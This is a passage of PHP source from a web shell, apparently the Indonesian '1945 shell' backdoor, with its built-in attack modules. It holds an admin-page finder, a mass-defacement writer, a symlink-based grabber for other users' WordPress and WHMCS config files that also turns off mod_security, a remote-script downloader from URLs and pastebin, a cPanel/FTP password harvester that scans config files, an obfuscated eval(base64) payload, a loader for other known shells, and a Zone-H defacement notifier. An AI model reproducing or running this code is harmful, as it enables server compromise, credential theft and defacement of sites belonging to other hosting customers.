762 curl_setopt($handle, CURLOPT_HTTPHEADER, Array("User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15") ); // request as if Firefox
763 curl_setopt($handle, CURLOPT_NOBODY, true);
764 curl_setopt($handle, CURLOPT_RETURNTRANSFER, false);
765 $connectable = curl_exec($handle);
766 curl_close($handle);
767 return $connectable;
768}
769 if(isset($_POST['submit']) && isset($_POST['url']))
770 {
771 $url= htmlentities(xss_protect($_POST['url']));
772 if(filter_var($url, FILTER_VALIDATE_URL))
773 {
774 $trying = array(':2082',':2083','a_admins/','admin/','adminweb/','po-admin','index.php?q=admin','administrator/','admin/admin.php','cpanel','admin3/','admin4/','admin5/','usuarios/',
775 'usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/',
776 'panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php',
777 'admin/index.php','admin/login.php','admin/admin.php','admin/account.php','admin_area/admin.php',
778 'admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html',
779 'admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php',
780 'bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admin.php',
781 'admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
782 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html',
783 'panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php',
784 'nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php',
785 'administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
786 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html',
787 'login.php','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php',
788 'pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
789 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php',
790 'adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php',
791 'admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
792 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html',
793 'login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html',
794 'panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html',
795 'adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
796 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php',
797 'adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php',
798 'panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php',
799 'adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
800 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','admin.asp','admin/admin.asp',
801 'admin_area/admin.asp','admin_area/login.asp','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp',
802 'bb-admin/admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','user.asp','webadmin/index.asp',
803 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp',
804 'adminLogin.asp','admin/adminLogin.asp','home.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp',
805 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp',
806 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
807 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp');
808 foreach($trying as $sec)
809 {
810 $urll=$url.'/'.$sec;
811 if(urlExist($urll))
812 {
813 echo '<p align="center"><font color="00FF00">[+] FOUND!! --> <a href="'.$urll.'" target="_blank">'.$urll.'</a></font></p>';
814 exit;
815 }
816 else
817 {
818 echo '<p align="center"><font color="#eee">[-] NOT FOUND --> '.$urll.'</font></p>';
819 }
820 }
821 echo 'Could not find admin page.[!]';
822 }
823 else
824 {
825 echo '<p>Invalid URL entered.[!]</p>';
826 }
827 }
828
829}elseif (isset($_GET['massdeface'])) {
830 echo'<center>
831 <h3> : Mass deface :</h3>
832 <small> by indoXploit </small>';
833 function sabun_massal($dir,$namafile,$isi_script) {
834 if(is_writable($dir)) {
835 $dira = scandir($dir);
836 foreach($dira as $dirb) {
837 $dirc = "$dir/$dirb";
838 $lokasi = $dirc.'/'.$namafile;
839 if($dirb === '.') {
840 file_put_contents($lokasi, $isi_script);
841 } elseif($dirb === '..') {
842 file_put_contents($lokasi, $isi_script);
843 } else {
844 if(is_dir($dirc)) {
845 if(is_writable($dirc)) {
846 echo "[<font color=lime>DONE</font>] $lokasi<br>";
847 file_put_contents($lokasi, $isi_script);
848 $idx = sabun_massal($dirc,$namafile,$isi_script);
849 }
850 }
851 }
852 }
853 }
854 }
855 function sabun_biasa($dir,$namafile,$isi_script) {
856 if(is_writable($dir)) {
857 $dira = scandir($dir);
858 foreach($dira as $dirb) {
859 $dirc = "$dir/$dirb";
860 $lokasi = $dirc.'/'.$namafile;
861 if($dirb === '.') {
862 file_put_contents($lokasi, $isi_script);
863 } elseif($dirb === '..') {
864 file_put_contents($lokasi, $isi_script);
865 } else {
866 if(is_dir($dirc)) {
867 if(is_writable($dirc)) {
868 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
869 file_put_contents($lokasi, $isi_script);
870 }
871 }
872 }
873 }
874 }
875 }
876 if($_POST['start']) {
877 if($_POST['tipe_sabun'] == 'mahal') {
878 echo "<div style='margin: 5px auto; padding: 5px'>";
879 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
880 echo "</div>";
881 } elseif($_POST['tipe_sabun'] == 'murah') {
882 echo "<div style='margin: 5px auto; padding: 5px'>";
883 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
884 echo "</div>";
885 }
886 } else {
887 echo "<center>";
888 echo "<form method='post'>
889 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
890 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
891 <font style='text-decoration: underline;'>Folder:</font><br>
892 <input type='text' name='d_dir' value='$_GET[massdeface]' style='width: 450px;' height='10'><br>
893 <font style='text-decoration: underline;'>Filename:</font><br>
894 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
895 <font style='text-decoration: underline;'>Index File:</font><br>
896 <textarea name='script' style='width: 450px; height: 200px;'>JAYALAH INDONESIAKU</textarea><br>
897 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
898 </form></center>";
899 }
900}elseif (isset($_GET['conf'])) {
901
902error_reporting(0);
903?>
904<form method=post>
905<center>
906<textarea type=hidden name=user><?php if(!file("/etc/passwd")){ echo"/etc/passwd gak adda";}else{ echo file_get_contents('/etc/passwd');}?></textarea><br><br>
907<input type=submit name=su value="GO GO GO!!"></form>
908</center><?php
909
910if(isset($_POST['su']))
911 {
912 mkdir('1945~',0777);
913 $r = " \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
914$f = fopen('1945~/.htaccess','w');
915fwrite($f,$r);
916echo "<br><center><b><i><a href=1945~>TOUCH ME SENPAI</a></i></b></center>";
917$usr=explode("\n",$_POST['user']);
918foreach($usr as $uss)
919{
920 $us=trim($uss);
921$r="1945~/";
922symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
923symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
924symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
925symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
926symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
927symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
928symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
929symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
930symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
931symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
932symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
933}
934echo'<center>berhasil!! <a href="1945~" target="_blank">touch me senpai..</a></center>';
935}
936}elseif (isset($_GET['ctools'])) {
937 echo'
938<center>
939<h3>: Create Your Tools :</h3>
940<p><font color=white> NB : Tools ini akan mengambil script dari URL format .txt atau dari pastebin</font></p>
941 <form method="post">
942 <table><tr>
943 <th colspan=2>Import from</th>
944 </tr><tr><td>
945 URL : </td><td><input type="text" name="url" placeholder="http://site.com/1.txt" style="width:200px"></td></tr><tr>
946 <td>
947 PASTEBIN :</td><td><input type="text" name="pastebin" placeholder="4hIh93nJ" style="width:200px"></td></tr>
948<tr><td>save as:</td><td><input type="text" name="pname" value="'.$_GET['ctools'].'/mytools.php" style="width:200px" required></td></tr>
949<tr><th colspan=2>
950 <input type="submit" value="create!" name="ctools"></th></tr>
951 </table>
952 </form>';
953if(isset($_POST['ctools'])){
954 if(!empty($_POST['url'])){
955 $st=file_get_contents(htmlspecialchars($_POST['url']));
956 $fp=fopen($_POST['pname'],'w');
957 if(fwrite($fp,$st)){
958 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
959 }
960 fclose($fp);
961 }else{
962 if(!empty($_POST['pastebin'])){
963 $st=file_get_contents(htmlspecialchars("http://pastebin.com/raw/".$_POST['pastebin']));
964 $fp=fopen($_POST['pname'],'w');
965 if(fwrite($fp,$st)){
966 echo "done!! --> <a href='?act=".$_GET['act']."&src=".$_POST['pname']."' target='_blank'>click here</a>";
967 }
968 fclose($fp);
969 }
970}
971}
972}elseif (isset($_GET['stringtools'])) {
973 echo' <center>
974 <h3>: String Tools :</h3>
975 [<a href="?act='.$_GET['act'].'&replace='.$_GET['stringtools'].'">Auto replace String</a>]<br>
976 <font color=white> NB : tools ini adalah perbaikan dari enc0de dec0de script dan saya tambahkan coventer</font>
977 <br>
978<form method="post">
979<textarea name="e" style="width:77%;height:300px" class="form-control" placeholder="input string here [!]">
980</textarea><br><br>
981
982 <select name="opt" class="form-control" style="width:70%">
983 <optgroup label="Converter">
984 <option value="dechex">Decimal to Hexa</option> <option value="hexdec">Hexa to Decimal</option>
985<option value="decoct">Decimal to Octa</option>
986<option value="octdec">Octa to Decimal</option>
987 <option value="decbin">Decimal to Binary</option>
988 <option value="bindec">Binary to Decimal</option>
989 <option value="hexbin">Hexa to Binary</option>
990<option value="binhex">Binary to Hexa</option>
991</optgroup><optgroup label="encode&decode">
992 <option value="url">URL</option> <option value="base64">base64</option>
993<option value="urlbase64">URL - base64</option>
994<option value="cuu">Convert_uu</option>
995<option value="sgzcuus64">str_rot13 - gzinflate - convert_uu - str_rot13 - base64 </option>
996<option value="gz64">gzinflate - base64</option>
997 <option value="sgz64">str_rot13 - gzinflate - base64</option>
998 <option value="s64">str_rot13 - gzinflate - str_rot13 - base64</option>
999<option value="sb64">str_rot13 - base64 </option>
1000 <option value="64url">URL - base64</option>
1001<option value="64u64u">URL - base64 - url - base64</option>
1002<option value="ss64"> base64 - str_rot13 - str_rot13</option>
1003</optgroup>
1004 </select>
1005 <br>
1006<input type="submit" value="Convert!" name="c" class="btn btn-success btn-sm">
1007<input type="submit" value="enc0de" name="en" class="btn btn-primary btn-sm">
1008<input type="submit" value="dec0de" name="de" class="btn btn-danger btn-sm">
1009</form>
1010
1011 ';
1012 $a = $_POST['e'];
1013 $o = $_POST['opt'];
1014 if(isset($_POST['c'])){
1015 switch($o){
1016 case'dechex';
1017 $s= dechex($a);
1018 break;
1019 case'dechex';
1020 $s= hexdec($a);
1021 break;
1022 case'decoct';
1023 $s= decoct($a);
1024 break;
1025 case'octdec';
1026 $s= octdec($a);
1027 break;
1028 case'decbin';
1029 $s= decbin($a);
1030 break;
1031 case'bindec';
1032 $s= bindec($a);
1033 break;
1034 case'hexbin';
1035 $s= hex2bin($a);
1036 break;
1037 case'binhex';
1038 $s= bin2hex($a);
1039 break;
1040 }
1041echo'<br>:: OutPut ::<br><textarea style="width:77%;height:300px ">'.$s.'</textarea>';
1042 }elseif(isset($_POST['en'])){
1043 switch($o){
1044 case'url';
1045 $r=urlencode($a);
1046 break;
1047 case'base64';
1048 $r=base64_encode($a);
1049 break;
1050 case'urlbase64';
1051 $r=urlencode(base64_encode($a));
1052 break;
1053 case'gz64';
1054 $r=base64_encode(gzdeflate($a));
1055
1056 break;
1057 case'sgz64';
1058 $r=base64_encode(gzdeflate(str_rot13($a)));
1059 break;
1060 case's64';
1061 $r=(base64_encode(str_rot13(gzdeflate(str_rot13($a)))));
1062 break;
1063 case'sb64';
1064 $r=base64_encode(str_rot13($a));
1065 break;
1066 case'64url';
1067 $r=base64_encode(urlencode($a));
1068 break;
1069 case'64u64u';
1070 $r=base64_encode(urlencode(base64_encode(urlencode($a))));
1071 break;
1072 case'cuu';
1073 $r=convert_uuencode($a);
1074 break;
1075 case'sgzcuus64';
1076 $r=base64_encode(str_rot13(convert_uuencode(gzdeflate(str_rot13($a)))));
1077 break;
1078 case'ss64';
1079 $r=str_rot13(str_rot13(base64_encode($a)));
1080 break;
1081 }
1082 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$r.'</textarea>';
1083
1084 }
1085//Dec0de
1086 if(isset($_POST['de'])){
1087 switch($o){
1088 case'url';
1089 $r=urldecode($a);
1090 break;
1091 case'base64';
1092 $r=base64_decode($a);
1093 break;
1094 case'urlbase64';
1095 $r=base64_decode(urldecode($a));
1096 break;
1097 case'gz64';
1098 $r=gzinflate(base64_decode($a));
1099
1100 break;
1101 case'sgz64';
1102 $r=str_rot13(gzinflate(base64_decode($a)));
1103 break;
1104 case's64';
1105 $r=str_rot13(gzinflate(str_rot13(base64_decode($a))));
1106 break;
1107 case'sb64';
1108 $r=str_rot13(base64_decode($a));
1109 break;
1110 case'64url';
1111 $r=urldecode(base64_decode($a));
1112 break;
1113 case'64u64u';
1114 $r=urldecode(base64_decode(urldecode(base64_decode($a))));
1115 break;
1116 case'cuu';
1117 $r=convert_uudecode($a);
1118 break;
1119 case'sgzcuus64';
1120 $r=str_rot13(gzinflate(convert_uudecode(str_rot13(base64_decode($a)))));
1121 break;
1122 case'ss64';
1123 $r=base64_decode(str_rot13(str_rot13($a)));
1124 }
1125 $rx = htmlspecialchars($r);
1126 echo'<br>:: OutPut::<br><textarea style="width:77%;height:300px" >'.$rx.'</textarea>';
1127
1128 }
1129
1130}elseif (isset($_GET['about'])) {
1131 ?>
1132<center>
1133<h2 style="font-family:courier;">1945 shell <br>
1134<small style="border-bottom:1px solid #fff;"> c0dename : freedom is real!!</small></h2>
1135<img src="https://2.bp.blogspot.com/-fE4-9A9N5Gk/V1h9fkMT75I/AAAAAAAAF6o/gz0oZg-G6kkB-VL8nIxsDocraNsiYdb2QCLcB/s320/Logo%2BHUT%2BRI%2BKe-71%2BTahun%2B2016.jpg" width="500" height="300">
1136<br>
1137<table>
1138<tr><td>PROKLAMASI</td><td>
1139<marquee scrollamount=5><i><b><font color=white>
1140 Kami bangsa Indonesia dengan ini menjatakan kemerdekaan Indonesia.
1141 Hal2 jang mengenai pemindahan kekoeasaan d.l.l., diselenggarakan
1142 dengan tjara saksama dan dalam tempoh jang sesingkat-singkatnja. Jakarta 17-08-'05 Atas nama bangsa indonesia : Soekarno - Hatta</marquee></td></tr></table>
1143<h3 style="text-shadow:2px 3px 3px #fff;"> : 1945 shell ~ 71th INDONESIA KERJA NYATA:</h3>
1144<p>Assalamualaikum wr. wb.</p>
1145<pre>
1146okey.. kawan gak banyak omong!
1147shell (backd00r) ini <font color=lime>bukan rec0de dari shell manapun dan gak semuaNya saya c0ding sendiri </font> ada beberapa tools dari google dan pastebin,
1148kenapa nama shell ini "1945" karena saya ingin membuat karya pada hari kemerdekaan indonesia (code kemerdekaan 17081945),
1149udah gitu aja~ kalo ada yang gk suka atau keluhan bisa priksa ke dokter ;'v [<a href='https://facebook.com/JKT48.co' target='_blank'>dokter tamvan</a>] atau [<a href='https://twitter.com/alinmansby' target='_blank'>dokter ganteng</a>]
1150+------------------------------------------------------------------------------------------------------------+
1151 1945 shell by : shutdown57
1152: Greet Thanks :
1153-- Tuhan YME -- Pahlawan perjuangan Indonsia --
1154-- [-]sh4d0w_99[!] -- MRG#7 -- sunr15 -- kinayayume48 -- root@hex -- xXx-ID -- pastebin.com -- google.com --
1155+------------------------------------------------------------------------------------------------------------+
1156<FONT COLOR=WHITE>
1157UCAPAN TERIMAKASIH BUAANYYAK KEPADA YANG TELAH MENGHARGAI DAN MENGGUNAKAN KARYA ANAK INGUSAN INI :), HANYA ITU YANG BISA SAYA SAMPAIKAN.
1158</FONT>
1159<pre style="color:pink">
1160<b><i>Quotes :</b></i>
1161<br>
1162<b>"Jangan sekali-sekali meragukan kemerdekaan bangsa INDONESIA , karna itu berarti bahwa anda tidak menghargai jasa para pahlawan yang telah berjuang dan mendapatkan kemerdekaan kita :)"</b>
1163"Cintailah sesuatu yang berasal dari tanah kelahiranMu sendiri"
1164"Jangan sekali-sekali menghina,menghujat,mencaci maki budayaMu sendiri! :) hanya orang tidak waras yang melakukanNya"
1165"Siapa yang harus di salahkan ketika SDM kita rendah?,salahkanlah diri kalian masing-masing! karena kalian juga termasuk SDM bangsa indonesia"
1166<i>./shutdown57 & kinayayume48</i>
1167</pre>
1168SEKIAN.
1169---------+
1170</pre>
1171 <?php
1172}elseif (isset($_GET['unzip'])) {
1173echo'
1174<center>
1175<h3>: Unzip Files :</h3>
1176<br>
1177<table border=1>
1178<tr><td>file zip</td><td>Target Dir</td>
1179</tr>
1180<tr><td>
1181<form method="post">
1182<input type="text" name="filezip" value="'.$_GET['unzip'].'/file.zip" >
1183</td><td>
1184<input type="text" name="dirzip" value="'.$_GET['unzip'].'/" >
1185</td></tr>
1186</table>
1187<input type="submit" name="ext" value="unzip!!">
1188</form>';
1189
1190if(isset($_POST['ext'])){
1191 $zip = new ZipArchive;
1192$res = $zip->open($_POST['filezip']);
1193
1194if ($res === TRUE) {
1195
1196$zip->extractTo($_POST['dirzip']);
1197
1198$zip->close();
1199 echo "<br>DONE..!! extracted !";
1200 } else {
1201
1202echo "failed";
1203 }
1204}
1205}elseif (isset($_GET['download'])) {
1206 ob_clean();
1207 $dunlut = $_GET['download'];
1208 header('Content-Description: File Transfer');
1209 header('Content-Type: application/octet-stream');
1210 header('Content-Disposition: attachment; filename="'.basename($dunlut).'"');
1211 header('Expires: 0');
1212 header('Cache-Control: must-revalidate');
1213 header('Pragma: public');
1214 header('Content-Length: ' . filesize($dunlut));
1215 readfile($dunlut);
1216 exit;
1217
1218}elseif (isset($_GET['mail'])) {
1219 $e=function_exists('mail');
1220 if($e){
1221 echo "
1222 <center>
1223 <h3>: mail sender :</h3>
1224 <br>
1225 <form method='post' >
1226 <table border=1>
1227 <tr>
1228 <td>from :</td><td><input type='text' name='from' value='shutdown57@indonesia.go.id' ></td></tr>
1229 <tr><td>For:</td><td><input type='text' name='for' value='admin@".$_SERVER['HTTP_HOST']."'></td></tr>
1230 <tr><td>Subject:</td><td><input type='text' name='subject' value='patch ur site!' ></td></tr>
1231 </table>
1232 <textarea name='cont' style='width:500px;height:300px'>please..patch ur face! ur face is bad :p </textarea>
1233 <br>
1234 <input type='submit' name='sent' value='send!!' >
1235 </form>";
1236
1237}else{
1238 echo" mail() function does not exists in this website!";
1239}
1240if(isset($_POST['sent'])){
1241 if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){
1242 echo "send!!".$_POST['for'];
1243 }else{
1244 echo"failed !!!";
1245 }
1246}
1247}elseif (isset($_GET['kuchiyose'])) {
1248echo "
1249<center>
1250<h3>: Kuchiyose No Jutsu :</h3>
1251<br>
1252<p><font color=white>NB : Jika ada error/script tidak muncul ,ganti IP mu atau pake anonymoX<br>
1253(saran IP USA ) </font></p>
1254<table><tr><td>
1255<pre style='text-align:left;'>
1256 [<a href='?act=".$_GET['act']."&kuchiyose=wso'>WSO shell</a>]
1257 [<a href='?act=".$_GET['act']."&kuchiyose=jkt48'>JKT48 priv8 shell</a>]
1258 [<a href='?act=".$_GET['act']."&kuchiyose=bejak'>b374k shell</a>]
1259 [<a href='?act=".$_GET['act']."&kuchiyose=indoxploit_shell'>indoXploit shell</a>]
1260 [<a href='?act=".$_GET['act']."&kuchiyose=andela'>andela priv8 shell</a>]
1261 [<a href='?act=".$_GET['act']."&kuchiyose=injection'>1n73ction shell </a>]
1262 [<a href='?act=".$_GET['act']."&kuchiyose=sbh'>Surabaya BlackHat shell </a>]
1263 [<a href='?act=".$_GET['act']."&kuchiyose=bh'>BlackHat shell</a>]
1264 [<a href='?act=".$_GET['act']."&kuchiyose=c99'>C99 shell</a>]
1265 [<a href='?act=".$_GET['act']."&kuchiyose=r57'>r57 shell</a>]
1266 [<a href='?act=".$_GET['act']."&kuchiyose=adminer'>adminer</a>]
1267 [<a href='?act=".$_GET['act']."&kuchiyose=terminal'>terminal</a>]
1268 [<a href='?act=".$_GET['act']."&kuchiyose=root'>ByPass R00t Path</a>]
1269 [<a href='?act=".$_GET['act']."&kuchiyose=pastebin'>Pastebin auto post</a>]
1270 [<a href='?act=".$_GET['act']."&kuchiyose=whmcs'>WHMCS killer</a>]
1271 [<a href='?act=".$_GET['act']."&kuchiyose=bypass_shell'>Bypass Shell To .JPG Files</a>]
1272</pre>
1273</td><td>
1274<img src='https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Flag_map_of_Indonesia.svg/2000px-Flag_map_of_Indonesia.svg.png' width='100%' height='100%'>
1275</td></tr>
1276</table>
1277<br><br>
1278<p><b><i><font color=white>MOHON MAAF JIKA SAYA NEMCANTUMKAN SCRIPT ANDA TANPA IJIN :V </font></b></i></p>";
1279}elseif (isset($_GET['cpbrute'])) {
1280 echo '';
1281 ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1282 set_time_limit(0);
1283
1284 @$passwd = fopen('/etc/passwd','r');
1285 if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
1286 $pub = array();
1287 $users = array();
1288 $conf = array();
1289 $i = 0;
1290 while(!feof($passwd))
1291 {
1292 $str = fgets($passwd);
1293 if ($i > 35)
1294 {
1295 $pos = strpos($str,':');
1296 $username = substr($str,0,$pos);
1297 $dirz = '/home/'.$username.'/public_html/';
1298 if (($username != ''))
1299 {
1300 if (is_readable($dirz))
1301 {
1302 array_push($users,$username);
1303 array_push($pub,$dirz);
1304 }
1305 }
1306 }
1307 $i++;
1308 }
1309
1310 echo '<h3>: cPanel bruteForce</h3>
1311 <br>
1312 <br>
1313 <center>
1314 <textarea>';
1315 echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
1316 echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
1317 echo "[~] Searching for passwords in config files...\n\n";
1318 foreach ($users as $user)
1319 {
1320 $path = "/home/$user/public_html/";
1321 read_dir($path,$user);
1322 }
1323 echo "\n[+] Done !\n";
1324 function read_dir($path,$username)
1325 {
1326 if ($handle = opendir($path))
1327 {
1328 while (false !== ($file = readdir($handle)))
1329 {
1330 $fpath = "$path$file";
1331 if (($file != '.') and ($file != '..'))
1332 {
1333 if (is_readable($fpath))
1334 {
1335 $dr = $fpath."/";
1336 if (is_dir($dr))
1337 {
1338 read_dir($dr,$username);
1339 }
1340 else
1341 {
1342 if (
1343 ($file=='config.php')
1344 or ($file=='config.inc.php')
1345 or ($file=='conf.php')
1346 or ($file=='settings.php')
1347 or ($file=='configuration.php')
1348 or ($file=='wp_config.php')
1349 or ($file=='wp-config.php')
1350 or ($file=='inc.php')
1351 or ($file=='setup.php')
1352 or ($file=='dbconf.php')
1353 or ($file=='dbconfig.php')
1354 or ($file=='db.inc.php')
1355 or ($file=='dbconnect.php')
1356 or ($file=='connect.php')
1357 or ($file=='common.php')
1358 or ($file=='config_global.php')
1359 or ($file=='db.php')
1360 or ($file=='connect.inc.php')
1361 or ($file=='e107_config.php')
1362 or ($file=='dbconnect.inc.php'))
1363 {
1364 $pass = get_pass($fpath);
1365 if ($pass != '')
1366 {
1367 echo "[+] $fpath\n$pass\n";
1368 ftp_check($username,$pass);
1369 }
1370 }
1371 }
1372 }
1373 }
1374 }
1375 }
1376 }
1377 function get_pass($link)
1378 {
1379 @$config = fopen($link,'r');
1380 while(!feof($config))
1381 {
1382 $line = fgets($config);
1383 if (strstr($line,'pass')
1384 or strstr($line,'pwd')
1385 or strstr($line,'db_pass')
1386 or strstr($line,'dbpass')
1387 or strstr($line,'passwd'))
1388 {
1389 if (strrpos($line,'"'))
1390 {
1391 preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
1392 $pass = str_replace("]=\"","",$pass);
1393 }
1394
1395 else
1396 preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
1397 $pass = str_replace("]='","",$pass);
1398 return $pass[2];
1399 }
1400 }
1401 }
1402 function ftp_check($login,$pass)
1403 {
1404 @$ftp = ftp_connect('127.0.0.1');
1405 if ($ftp)
1406 {
1407 @$res = ftp_login($ftp,$login,$pass);
1408 if ($res)
1409 {
1410 echo '[FTP] '.$login.':'.$pass." Success !\n\n";
1411
1412 eval(gzinflate(base64_decode('rVPBbtswDL0b8D9ohoEmgFtUzmVo1qHDkC49rDPiZId2RaDITOrVEQ3JQdEN+6D95UTJSbHB2cnxQeIj3yMjknGBW1EqdsniZT6ZfZ3M7k+m83m2nH7J5ycP4zCI65Rbd8r9PaV76u/nb51lD7Kld64NyiesQQ1ir50QK4lBa4XuMI1O+Pmw5fBjHH6c4xN3sqyrm0dfuR68cXUOw+BnLPhlNNEadTT+FQZQGdij+U5KMCYar2WFBgaeQ1GvGtxrpJ0aabcG/0fDFutVRp0qo24VYnkd6oKxzYvC4LSv3zcVBh9roaBii7oQDbAbtUZ2X+MzaCjY6oV9WtzcTnI2A4kFEPBZmKflVmxKWQp1xx4YifRa0RRNwy5Y22hCFgY0IRVuPJAJYwio7dl7/g+2DXXDMtSN+3N5PrW5nGknhpDrefaKpITIzL3iARz1XtVvu3yct/1I/urCD5v10LCZHZ2VUEXZ3PVcQ0Qb2aDdxkiozaYEgVpcvYhHxDOJW+fWIMv6vxFmt/oOsqGY9tHovU3eTqCLeQRRgDYUc61xe8F2zvdOwbO5kvWpN89KO6zviWDnpBrY0pK9ekK7kux1hocQV97RqD8=')));
1413
1414 echo '[SSH] Port' .':' .$a1. " !\n\n";
1415 echo '[FTP] Port' .':' .$a2. " !\n\n";
1416 echo '[cPanel] Port' .':' .$a3. " !\n\n";
1417
1418 }
1419 else ftp_quit($ftp);
1420 }
1421 }
1422 echo '</textarea><br><br><b>BruteForce Completed ...</b>';
1423}elseif (isset($_GET['copy'])) {
1424echo'
1425<center>
1426<h3>: copy file :</h3>
1427<br>
1428<form method="post">
1429file :<input type="text" name="copy" value="'.$_GET['act'].'" style="width:200px"> copy to:
1430<input type="text" name="copied" value="'.$_GET['act'].'/copy-" style="width:200px">
1431<input type="submit" name="cop" value=">>">
1432</form>';
1433if(isset($_POST['cop'])){
1434 if(copy($_POST['copy'],$_POST['copied'])){
1435 echo" done!! copied! <a href='?act=".$_GET['act']."&src=".$_POST['copied']."'>".$_POST['copied']."</a>";
1436 }
1437}
1438}elseif ($_GET['act']=='logout') {
1439 session_destroy();
1440 echo'<script>
1441 alert("bye.. !!!!!!!!");
1442 window.location.href="?";
1443 </script>';
1444}elseif (isset($_GET['phpinfo'])) {
1445 phpinfo();
1446}elseif (isset($_GET['zoneh'])) {
1447?>
1448<center>
1449<h3>: Zone-H Mass Notifer :</h3>
1450</center>
1451<form method="post">
1452<center>
1453<input type="text" name="depecer" style="width:500px" placeholder="defacer">
1454<br>
1455<textarea name="url" placeholder="http://korban.com" style="width:500px;height:300px;"></textarea><br>
1456<input type="submit" name="go" value="subMitt" >
1457</form>
1458<?php
1459$url = explode("\r\n", $_POST['url']);
1460$go = $_POST['go'];
1461function kirim($target,$hacker) {
1462 $ch = curl_init();
1463 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1464 curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single");
1465 curl_setopt($ch, CURLOPT_POST, true);
